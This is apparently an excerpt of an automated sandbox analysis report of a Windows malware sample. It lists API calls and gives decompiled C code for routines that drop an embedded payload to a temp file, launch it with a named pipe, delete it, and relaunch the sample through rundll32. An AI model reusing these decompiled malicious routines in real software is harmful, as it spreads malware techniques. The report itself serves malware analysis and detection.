                                                                                                                                                              • memcpy.MSVCRT ref: 04E22605
                                                                                                                                                              • memcpy.MSVCRT ref: 04E22617
                                                                                                                                                              • send.WS2_32(?,00000000,0000111C,00000000), ref: 04E22630
                                                                                                                                                              • send.WS2_32(?,?,00000168,00000000), ref: 04E2264D
                                                                                                                                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04E22697
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04E2471C,?,?,?,?,?), ref: 04E226BF
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,04E2471C,?,?,?,?,?), ref: 04E226C6
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04E2471C,?,?,?,?,?), ref: 04E226CF
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E226D6
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E226DF
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E226E6
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04E2471C,?,?,?,?,?), ref: 04E226F1
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E226F8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFree$rand$htonsmemcpysend$recv
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 3700823678-3175316637
                                                                                                                                                              • Opcode ID: e5501c6cc7df755c131360d00cda2fe22a13b6ee5e525786c20026ab88dc9808
                                                                                                                                                              • Instruction ID: 60c40d4e03655b9aa9714306ff280144fd7c551260f1e2d42aef2d8109eeae3c
                                                                                                                                                              • Opcode Fuzzy Hash: e5501c6cc7df755c131360d00cda2fe22a13b6ee5e525786c20026ab88dc9808
                                                                                                                                                              • Instruction Fuzzy Hash: 33712972900356EFEB149FA5CE49FAA7B64FF48701F044159FB04AB285D7BAE900CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E04E27146(void* __ecx, void* __esi) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				char _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				void* _v32;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				struct _PROCESS_INFORMATION _v52;
                                                                                                                                                              				struct _STARTUPINFOW _v120;
                                                                                                                                                              				short _v1680;
                                                                                                                                                              				void _v3728;
                                                                                                                                                              				short _v5776;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* _t56;
                                                                                                                                                              				void* _t57;
                                                                                                                                                              				int _t59;
                                                                                                                                                              				long* _t60;
                                                                                                                                                              				char _t62;
                                                                                                                                                              				char* _t64;
                                                                                                                                                              				char* _t66;
                                                                                                                                                              				void* _t68;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				char* _t73;
                                                                                                                                                              				int _t90;
                                                                                                                                                              				long _t95;
                                                                                                                                                              				void* _t99;
                                                                                                                                                              				signed int _t102;
                                                                                                                                                              				intOrPtr _t103;
                                                                                                                                                              				intOrPtr _t104;
                                                                                                                                                              				void* _t105;
                                                                                                                                                              				int _t109;
                                                                                                                                                              				void* _t114;
                                                                                                                                                              
                                                                                                                                                              				_t99 = __ecx;
                                                                                                                                                              				E04E2A760(0x168c);
                                                                                                                                                              				_t95 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_t7 = (0 | E04E26F7C(_t99, GetCurrentProcess()) != 0x00000000) + 1; // 0x1, executed
                                                                                                                                                              				_t56 = E04E28313(_t7,  &_v8,  &_v12); // executed
                                                                                                                                                              				if(_t56 != 0) {
                                                                                                                                                              					_t57 = 0;
                                                                                                                                                              					do {
                                                                                                                                                              						_t8 = _t57 + L"C:\\Windows\\"; // 0x3a0043
                                                                                                                                                              						_t102 =  *_t8 & 0x0000ffff;
                                                                                                                                                              						 *(_t114 + _t57 - 0x68c) = _t102;
                                                                                                                                                              						_t57 = _t57 + 2;
                                                                                                                                                              					} while (_t102 != 0);
                                                                                                                                                              					_t59 = GetTempFileNameW( &_v1680, 0, 0,  &_v1680); // executed
                                                                                                                                                              					if(_t59 == 0) {
                                                                                                                                                              						L16:
                                                                                                                                                              						_t103 = _v12;
                                                                                                                                                              						_t60 = _v8;
                                                                                                                                                              						if(_t103 == _t95) {
                                                                                                                                                              							L18:
                                                                                                                                                              							_t62 = RtlFreeHeap(GetProcessHeap(), _t95, _v8); // executed
                                                                                                                                                              							return _t62;
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L17;
                                                                                                                                                              						}
                                                                                                                                                              						do {
                                                                                                                                                              							L17:
                                                                                                                                                              							 *_t60 = _t95;
                                                                                                                                                              							_t60 =  &(_t60[0]);
                                                                                                                                                              							_t103 = _t103 - 1;
                                                                                                                                                              						} while (_t103 != 0);
                                                                                                                                                              						goto L18;
                                                                                                                                                              					}
                                                                                                                                                              					_v36 = 0;
                                                                                                                                                              					asm("stosd");
                                                                                                                                                              					asm("stosd");
                                                                                                                                                              					asm("stosd");
                                                                                                                                                              					_t64 =  &_v36;
                                                                                                                                                              					__imp__CoCreateGuid(_t64, _t105); // executed
                                                                                                                                                              					if(_t64 < 0) {
                                                                                                                                                              						L15:
                                                                                                                                                              						goto L16;
                                                                                                                                                              					}
                                                                                                                                                              					_t66 =  &_v36;
                                                                                                                                                              					_v16 = 0;
                                                                                                                                                              					__imp__StringFromCLSID(_t66,  &_v16); // executed
                                                                                                                                                              					if(_t66 < 0) {
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					_t68 = E04E26FAF(_v12,  &_v1680, _v8); // executed
                                                                                                                                                              					if(_t68 == 0) {
                                                                                                                                                              						L14:
                                                                                                                                                              						__imp__CoTaskMemFree(_v16);
                                                                                                                                                              						_t95 = 0;
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					wsprintfW( &_v3728, L"\\\\.\\pipe\\%ws", _v16);
                                                                                                                                                              					_t72 = CreateThread(0, 0, E04E26FFE,  &_v3728, 0, 0); // executed
                                                                                                                                                              					_v20 = _t72;
                                                                                                                                                              					if(_t72 != 0) {
                                                                                                                                                              						asm("stosd");
                                                                                                                                                              						asm("stosd");
                                                                                                                                                              						asm("stosd");
                                                                                                                                                              						asm("stosd");
                                                                                                                                                              						_t109 = 0x44;
                                                                                                                                                              						memset( &_v120, 0, _t109);
                                                                                                                                                              						_v120.wShowWindow = 0;
                                                                                                                                                              						_v120.cb = _t109;
                                                                                                                                                              						wsprintfW( &_v5776, L"\"%ws\" %ws",  &_v1680,  &_v3728);
                                                                                                                                                              						_t90 = CreateProcessW( &_v1680,  &_v5776, 0, 0, 0, 0x8000000, 0, 0,  &_v120,  &_v52); // executed
                                                                                                                                                              						if(_t90 != 0) {
                                                                                                                                                              							WaitForSingleObject(_v52, 0xea60);
                                                                                                                                                              							E04E26CC8( *0x4e37b80);
                                                                                                                                                              							TerminateThread(_v20, 0); // executed
                                                                                                                                                              						}
                                                                                                                                                              						CloseHandle(_v20);
                                                                                                                                                              					}
                                                                                                                                                              					_t104 = _v12;
                                                                                                                                                              					_t73 = _v8;
                                                                                                                                                              					if(_t104 == 0) {
                                                                                                                                                              						L13:
                                                                                                                                                              						E04E26FAF(_v12,  &_v1680, _v8); // executed
                                                                                                                                                              						DeleteFileW( &_v1680); // executed
                                                                                                                                                              						goto L14;
                                                                                                                                                              					} else {
                                                                                                                                                              						do {
                                                                                                                                                              							 *_t73 = 0;
                                                                                                                                                              							_t73 = _t73 + 1;
                                                                                                                                                              							_t104 = _t104 - 1;
                                                                                                                                                              						} while (_t104 != 0);
                                                                                                                                                              						goto L13;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t56;
                                                                                                                                                              			}


































                                                                                                                                                              0x04e27146
                                                                                                                                                              0x04e2714e
                                                                                                                                                              0x04e2715b
                                                                                                                                                              0x04e2715e
                                                                                                                                                              0x04e27161
                                                                                                                                                              0x04e27177
                                                                                                                                                              0x04e2717a
                                                                                                                                                              0x04e27181
                                                                                                                                                              0x04e27187
                                                                                                                                                              0x04e27189
                                                                                                                                                              0x04e27189
                                                                                                                                                              0x04e27189
                                                                                                                                                              0x04e27190
                                                                                                                                                              0x04e27198
                                                                                                                                                              0x04e2719b
                                                                                                                                                              0x04e271aa
                                                                                                                                                              0x04e271b2
                                                                                                                                                              0x04e27318
                                                                                                                                                              0x04e27318
                                                                                                                                                              0x04e2731b
                                                                                                                                                              0x04e27320
                                                                                                                                                              0x04e27328
                                                                                                                                                              0x04e27333
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27322
                                                                                                                                                              0x04e27322
                                                                                                                                                              0x04e27322
                                                                                                                                                              0x04e27324
                                                                                                                                                              0x04e27325
                                                                                                                                                              0x04e27325
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27322
                                                                                                                                                              0x04e271bb
                                                                                                                                                              0x04e271c1
                                                                                                                                                              0x04e271c2
                                                                                                                                                              0x04e271c3
                                                                                                                                                              0x04e271c4
                                                                                                                                                              0x04e271c8
                                                                                                                                                              0x04e271d0
                                                                                                                                                              0x04e27317
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27317
                                                                                                                                                              0x04e271da
                                                                                                                                                              0x04e271de
                                                                                                                                                              0x04e271e1
                                                                                                                                                              0x04e271e9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e271fc
                                                                                                                                                              0x04e27203
                                                                                                                                                              0x04e2730c
                                                                                                                                                              0x04e2730f
                                                                                                                                                              0x04e27315
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27315
                                                                                                                                                              0x04e2721f
                                                                                                                                                              0x04e27236
                                                                                                                                                              0x04e2723c
                                                                                                                                                              0x04e27241
                                                                                                                                                              0x04e2724c
                                                                                                                                                              0x04e2724d
                                                                                                                                                              0x04e2724e
                                                                                                                                                              0x04e27251
                                                                                                                                                              0x04e27252
                                                                                                                                                              0x04e27259
                                                                                                                                                              0x04e27260
                                                                                                                                                              0x04e2727e
                                                                                                                                                              0x04e27281
                                                                                                                                                              0x04e272a6
                                                                                                                                                              0x04e272ae
                                                                                                                                                              0x04e272b8
                                                                                                                                                              0x04e272c4
                                                                                                                                                              0x04e272cd
                                                                                                                                                              0x04e272cd
                                                                                                                                                              0x04e272d6
                                                                                                                                                              0x04e272d6
                                                                                                                                                              0x04e272dc
                                                                                                                                                              0x04e272df
                                                                                                                                                              0x04e272e5
                                                                                                                                                              0x04e272ed
                                                                                                                                                              0x04e272fa
                                                                                                                                                              0x04e27306
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e272e7
                                                                                                                                                              0x04e272e7
                                                                                                                                                              0x04e272e7
                                                                                                                                                              0x04e272e9
                                                                                                                                                              0x04e272ea
                                                                                                                                                              0x04e272ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e272e7
                                                                                                                                                              0x04e272e5
                                                                                                                                                              0x04e2733b

                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,?,04E27AF8), ref: 04E27164
                                                                                                                                                                • Part of subcall function 04E26F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04E27170,00000000,?,04E27AF8), ref: 04E26F8E
                                                                                                                                                                • Part of subcall function 04E26F7C: GetProcAddress.KERNEL32(00000000), ref: 04E26F95
                                                                                                                                                                • Part of subcall function 04E28313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04E2832A
                                                                                                                                                                • Part of subcall function 04E28313: LoadResource.KERNEL32(00000000), ref: 04E28341
                                                                                                                                                                • Part of subcall function 04E28313: LockResource.KERNEL32(00000000), ref: 04E28350
                                                                                                                                                                • Part of subcall function 04E28313: SizeofResource.KERNEL32(00000000), ref: 04E28368
                                                                                                                                                                • Part of subcall function 04E28313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04E28384
                                                                                                                                                                • Part of subcall function 04E28313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04E2838D
                                                                                                                                                                • Part of subcall function 04E28313: memcpy.MSVCRT ref: 04E2839C
                                                                                                                                                                • Part of subcall function 04E28313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04E283B9
                                                                                                                                                                • Part of subcall function 04E28313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04E283BC
                                                                                                                                                                • Part of subcall function 04E28313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04E2840A
                                                                                                                                                                • Part of subcall function 04E28313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04E2840D
                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,00000000,?,04E27AF8), ref: 04E271AA
                                                                                                                                                              • CoCreateGuid.OLE32(?,746543E0,?,04E27AF8), ref: 04E271C8
                                                                                                                                                              • StringFromCLSID.OLE32(?,?,?,04E27AF8), ref: 04E271E1
                                                                                                                                                              • wsprintfW.USER32 ref: 04E2721F
                                                                                                                                                              • CreateThread.KERNELBASE ref: 04E27236
                                                                                                                                                              • memset.MSVCRT ref: 04E27259
                                                                                                                                                              • wsprintfW.USER32 ref: 04E27281
                                                                                                                                                              • CreateProcessW.KERNELBASE ref: 04E272A6
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 04E272B8
                                                                                                                                                                • Part of subcall function 04E26CC8: EnterCriticalSection.KERNEL32(?,04E27B03), ref: 04E26CCD
                                                                                                                                                                • Part of subcall function 04E26CC8: InterlockedExchange.KERNEL32(?,00000001), ref: 04E26CD9
                                                                                                                                                                • Part of subcall function 04E26CC8: LeaveCriticalSection.KERNEL32(?), ref: 04E26CE0
                                                                                                                                                              • TerminateThread.KERNELBASE(?,00000000), ref: 04E272CD
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E272D6
                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,?), ref: 04E27306
                                                                                                                                                              • CoTaskMemFree.OLE32(?,?,?,?,04E27AF8), ref: 04E2730F
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,04E27AF8), ref: 04E2732C
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,04E27AF8), ref: 04E27333
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Resource$CreateFree$AllocateCriticalFileHandleSectionThreadwsprintf$AddressCloseCurrentDeleteEnterExchangeFindFromGuidInterlockedLeaveLoadLockModuleNameObjectProcSingleSizeofStringTaskTempTerminateWaitmemcpymemset
                                                                                                                                                              • String ID: Oet Uet0Xet$"%ws" %ws$\\.\pipe\%ws
                                                                                                                                                              • API String ID: 1475553426-498548874
                                                                                                                                                              • Opcode ID: acf8b28a58a53fe12f6741038bd197e183768ca74d5ea5296b0035bc05fd4123
                                                                                                                                                              • Instruction ID: 12e8e91d7e73f816a079ee98bf1b1ffe80284b20e5010c380266ad5c27b03849
                                                                                                                                                              • Opcode Fuzzy Hash: acf8b28a58a53fe12f6741038bd197e183768ca74d5ea5296b0035bc05fd4123
                                                                                                                                                              • Instruction Fuzzy Hash: 7D51E9B2900219BFEF219FE5DE88DEFB7BDEB08245F145565F605E3110EA35AE448B20
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 216 4e279d7-4e279ec call 4e27897 219 4e279ee-4e279f7 call 4e2923f 216->219 220 4e279fc-4e27a03 call 4e27f04 216->220 219->220 224 4e27a05-4e27a07 ExitProcess 220->224 225 4e27a0d-4e27a14 220->225 226 4e27a16 call 4e27e8e 225->226 227 4e27a1b-4e27acf call 4e284ee call 4e210a7 WSAStartup call 4e26c5f * 2 InitializeCriticalSection call 4e2652f call 4e27dd0 call 4e28192 CreateEventW CreateThread 225->227 226->227 243 4e27ad5-4e27ae8 CreateThread 227->243 244 4e27b99-4e27ba0 227->244 247 4e27aea-4e27af1 243->247 248 4e27af8-4e27b0a call 4e26cc8 243->248 245 4e27ba2-4e27baf call 4e2554a 244->245 246 4e27bde-4e27bf1 Sleep call 4e28a23 244->246 245->246 257 4e27bb1 245->257 255 4e27bf6-4e27c16 GetSystemDirectoryW 246->255 247->248 250 4e27af3 call 4e27146 247->250 259 4e27b63-4e27b93 call 4e26cc8 CreateThread call 4e2a420 Sleep 248->259 260 4e27b0c-4e27b31 call 4e26c5f call 4e285fb 248->260 250->248 261 4e27cc0-4e27cc2 255->261 262 4e27c1c-4e27c30 lstrcatW 255->262 263 4e27bb3-4e27bcd 257->263 259->244 260->259 277 4e27b33-4e27b39 260->277 262->261 266 4e27c36-4e27c4b GetModuleFileNameW 262->266 263->263 267 4e27bcf-4e27bd9 call 4e2636b 263->267 266->261 270 4e27c4d-4e27c7a PathFindFileNameW wsprintfW 266->270 267->246 275 4e27c7c-4e27c80 270->275 275->275 278 4e27c82-4e27c87 275->278 279 4e27b3c-4e27b4c call 4e2a3b1 call 4e2796e 277->279 280 4e27c8a-4e27c8e 278->280 286 4e27b5b-4e27b61 279->286 287 4e27b4e-4e27b56 call 4e26e66 279->287 280->280 282 4e27c90-4e27cba CreateProcessW ExitProcess 280->282 286->259 286->279 287->286
                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E04E279D7(void* __ebx, void* __ecx, void* __edi, char _a4, signed int _a8, char _a12, int _a16) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                              				struct _STARTUPINFOW _v92;
                                                                                                                                                              				char _v304;
                                                                                                                                                              				short _v1652;
                                                                                                                                                              				short _v1976;
                                                                                                                                                              				short _v3212;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t60;
                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				int _t78;
                                                                                                                                                              				char* _t84;
                                                                                                                                                              				char* _t85;
                                                                                                                                                              				void* _t91;
                                                                                                                                                              				char _t108;
                                                                                                                                                              				void* _t119;
                                                                                                                                                              				long _t120;
                                                                                                                                                              				signed char* _t121;
                                                                                                                                                              				long _t122;
                                                                                                                                                              				signed int _t124;
                                                                                                                                                              				signed int _t127;
                                                                                                                                                              				intOrPtr _t128;
                                                                                                                                                              				void* _t132;
                                                                                                                                                              				intOrPtr* _t134;
                                                                                                                                                              				void* _t135;
                                                                                                                                                              
                                                                                                                                                              				_t118 = __ecx;
                                                                                                                                                              				_push(_t128);
                                                                                                                                                              				E04E27897(__ecx, _t128);
                                                                                                                                                              				if(_a16 != 0xffffffff) {
                                                                                                                                                              					E04E2923F(__ecx, _a4, _a8, _a12); // executed
                                                                                                                                                              				}
                                                                                                                                                              				_t60 = E04E27F04(); // executed
                                                                                                                                                              				if(_t60 != 0) {
                                                                                                                                                              					ExitProcess(0);
                                                                                                                                                              				}
                                                                                                                                                              				_t142 =  *0x4e37bc0 & 0x00000002;
                                                                                                                                                              				if(( *0x4e37bc0 & 0x00000002) != 0) {
                                                                                                                                                              					E04E27E8E(_t118, _t142); // executed
                                                                                                                                                              				}
                                                                                                                                                              				E04E284EE(); // executed
                                                                                                                                                              				E04E210A7(); // executed
                                                                                                                                                              				_a8 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_a16 = 0;
                                                                                                                                                              				_a4 = 0;
                                                                                                                                                              				__imp__#115(0x202, 0x4e381e0); // executed
                                                                                                                                                              				_t63 = E04E26C5F(0x24, E04E26AA8, 0, 0xffff); // executed
                                                                                                                                                              				 *0x4e37bb8 = _t63;
                                                                                                                                                              				 *0x4e37b80 = E04E26C5F(8, E04E267F9, E04E2682F, 0xff);
                                                                                                                                                              				 *0x4e37b88 = 0;
                                                                                                                                                              				InitializeCriticalSection(0x4e37b9c);
                                                                                                                                                              				E04E2652F(_t118, _a12); // executed
                                                                                                                                                              				E04E27DD0(_t118,  &_a8,  &_v8,  &_a16,  &_a4); // executed
                                                                                                                                                              				E04E28192(); // executed
                                                                                                                                                              				_t72 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                              				_v24.dwThreadId = _t72;
                                                                                                                                                              				CreateThread(0, 0, E04E28A6F, _t72, 0, 0); // executed
                                                                                                                                                              				if(( *0x4e37b7c & 0x00000002) != 0) {
                                                                                                                                                              					CreateThread(0, 0, E04E277D1, 0, 0, 0); // executed
                                                                                                                                                              					if(( *0x4e37bc0 & 0x00000002) != 0 && ( *0x4e37b7c & 0x00000001) != 0) {
                                                                                                                                                              						E04E27146(_t118, _t128); // executed
                                                                                                                                                              					}
                                                                                                                                                              					E04E26CC8( *0x4e37b80);
                                                                                                                                                              					_t146 =  *0x4e37bc0 & 0x00000004;
                                                                                                                                                              					if(( *0x4e37bc0 & 0x00000004) != 0) {
                                                                                                                                                              						 *0x4e37b88 = E04E26C5F(4, E04E2787C, 0, 0xff);
                                                                                                                                                              						_push( &_v304);
                                                                                                                                                              						_t108 = E04E285FB(_t146);
                                                                                                                                                              						if(_t108 != 0) {
                                                                                                                                                              							_t134 =  &_v304;
                                                                                                                                                              							_a12 = _t108;
                                                                                                                                                              							do {
                                                                                                                                                              								E04E2A3B1(_t118,  *_t134);
                                                                                                                                                              								if(E04E2796E(_t118,  *_t134) != 0) {
                                                                                                                                                              									E04E26E66(_t118,  *0x4e37b88, _t134, 0);
                                                                                                                                                              								}
                                                                                                                                                              								_t134 = _t134 + 4;
                                                                                                                                                              								_t28 =  &_a12;
                                                                                                                                                              								 *_t28 = _a12 - 1;
                                                                                                                                                              							} while ( *_t28 != 0);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t128 =  *0x4e37b88;
                                                                                                                                                              					E04E26CC8(_t128);
                                                                                                                                                              					CreateThread(0, 0, E04E2A1A9, 0, 0, 0); // executed
                                                                                                                                                              					E04E2A420(_t118, _a16 * 0xea60); // executed
                                                                                                                                                              					Sleep(_a8 * 0xea60); // executed
                                                                                                                                                              				}
                                                                                                                                                              				if(( *0x4e37b7c & 0x00000010) != 0) {
                                                                                                                                                              					_t91 = E04E2554A(_t118,  &(_v92.dwFlags), 0x21); // executed
                                                                                                                                                              					if(_t91 != 0) {
                                                                                                                                                              						_t132 = 0;
                                                                                                                                                              						do {
                                                                                                                                                              							_t121 = _t135 + _t132 - 0x2c;
                                                                                                                                                              							_t127 = 0x3e;
                                                                                                                                                              							_t124 = ( *_t121 & 0x000000ff) % _t127;
                                                                                                                                                              							_t132 = _t132 + 1;
                                                                                                                                                              							_t41 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + _t124; // 0x33323130
                                                                                                                                                              							 *_t121 =  *_t41;
                                                                                                                                                              						} while (_t132 < 0x20);
                                                                                                                                                              						_v24.dwProcessId = 0;
                                                                                                                                                              						E04E2636B( &(_v92.dwFlags), _v24.dwThreadId); // executed
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				Sleep((_a4 + _v8) * 0xea60); // executed
                                                                                                                                                              				E04E28A23();
                                                                                                                                                              				asm("int3");
                                                                                                                                                              				_push(_t135);
                                                                                                                                                              				_push(_t128);
                                                                                                                                                              				_t78 = GetSystemDirectoryW( &_v1976, 0x30c);
                                                                                                                                                              				if(_t78 != 0) {
                                                                                                                                                              					_t78 = lstrcatW( &_v1652, L"\\rundll32.exe");
                                                                                                                                                              					if(_t78 != 0) {
                                                                                                                                                              						_t78 = GetModuleFileNameW( *0x4e37b98, 0x4e37bc8, 0x30c);
                                                                                                                                                              						if(_t78 != 0) {
                                                                                                                                                              							wsprintfW( &_v3212, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1652, PathFindFileNameW(0x4e37bc8), _a8);
                                                                                                                                                              							_t119 = 0x10;
                                                                                                                                                              							_t84 =  &_v24;
                                                                                                                                                              							do {
                                                                                                                                                              								 *_t84 = 0;
                                                                                                                                                              								_t84 = _t84 + 1;
                                                                                                                                                              								_t119 = _t119 - 1;
                                                                                                                                                              							} while (_t119 != 0);
                                                                                                                                                              							_t122 = 0x44;
                                                                                                                                                              							_t120 = _t122;
                                                                                                                                                              							_t85 =  &_v92;
                                                                                                                                                              							do {
                                                                                                                                                              								 *_t85 = 0;
                                                                                                                                                              								_t85 = _t85 + 1;
                                                                                                                                                              								_t120 = _t120 - 1;
                                                                                                                                                              							} while (_t120 != 0);
                                                                                                                                                              							_v92.cb = _t122;
                                                                                                                                                              							_t78 = CreateProcessW( &_v1652,  &_v3212, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                                                                                                                                              							ExitProcess(0);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t78;
                                                                                                                                                              			}





























                                                                                                                                                              0x04e279d7
                                                                                                                                                              0x04e279e1
                                                                                                                                                              0x04e279e3
                                                                                                                                                              0x04e279ec
                                                                                                                                                              0x04e279f7
                                                                                                                                                              0x04e279f7
                                                                                                                                                              0x04e279fc
                                                                                                                                                              0x04e27a03
                                                                                                                                                              0x04e27a07
                                                                                                                                                              0x04e27a07
                                                                                                                                                              0x04e27a0d
                                                                                                                                                              0x04e27a14
                                                                                                                                                              0x04e27a16
                                                                                                                                                              0x04e27a16
                                                                                                                                                              0x04e27a1b
                                                                                                                                                              0x04e27a20
                                                                                                                                                              0x04e27a31
                                                                                                                                                              0x04e27a34
                                                                                                                                                              0x04e27a37
                                                                                                                                                              0x04e27a3a
                                                                                                                                                              0x04e27a3d
                                                                                                                                                              0x04e27a50
                                                                                                                                                              0x04e27a66
                                                                                                                                                              0x04e27a75
                                                                                                                                                              0x04e27a7a
                                                                                                                                                              0x04e27a80
                                                                                                                                                              0x04e27a89
                                                                                                                                                              0x04e27a9e
                                                                                                                                                              0x04e27aa3
                                                                                                                                                              0x04e27aad
                                                                                                                                                              0x04e27ac3
                                                                                                                                                              0x04e27ac6
                                                                                                                                                              0x04e27acf
                                                                                                                                                              0x04e27adf
                                                                                                                                                              0x04e27ae8
                                                                                                                                                              0x04e27af3
                                                                                                                                                              0x04e27af3
                                                                                                                                                              0x04e27afe
                                                                                                                                                              0x04e27b03
                                                                                                                                                              0x04e27b0a
                                                                                                                                                              0x04e27b1e
                                                                                                                                                              0x04e27b29
                                                                                                                                                              0x04e27b2a
                                                                                                                                                              0x04e27b31
                                                                                                                                                              0x04e27b33
                                                                                                                                                              0x04e27b39
                                                                                                                                                              0x04e27b3c
                                                                                                                                                              0x04e27b3e
                                                                                                                                                              0x04e27b4c
                                                                                                                                                              0x04e27b56
                                                                                                                                                              0x04e27b56
                                                                                                                                                              0x04e27b5b
                                                                                                                                                              0x04e27b5e
                                                                                                                                                              0x04e27b5e
                                                                                                                                                              0x04e27b5e
                                                                                                                                                              0x04e27b3c
                                                                                                                                                              0x04e27b31
                                                                                                                                                              0x04e27b63
                                                                                                                                                              0x04e27b69
                                                                                                                                                              0x04e27b78
                                                                                                                                                              0x04e27b84
                                                                                                                                                              0x04e27b93
                                                                                                                                                              0x04e27b93
                                                                                                                                                              0x04e27ba0
                                                                                                                                                              0x04e27ba8
                                                                                                                                                              0x04e27baf
                                                                                                                                                              0x04e27bb1
                                                                                                                                                              0x04e27bb3
                                                                                                                                                              0x04e27bb3
                                                                                                                                                              0x04e27bbe
                                                                                                                                                              0x04e27bbf
                                                                                                                                                              0x04e27bc1
                                                                                                                                                              0x04e27bc2
                                                                                                                                                              0x04e27bc8
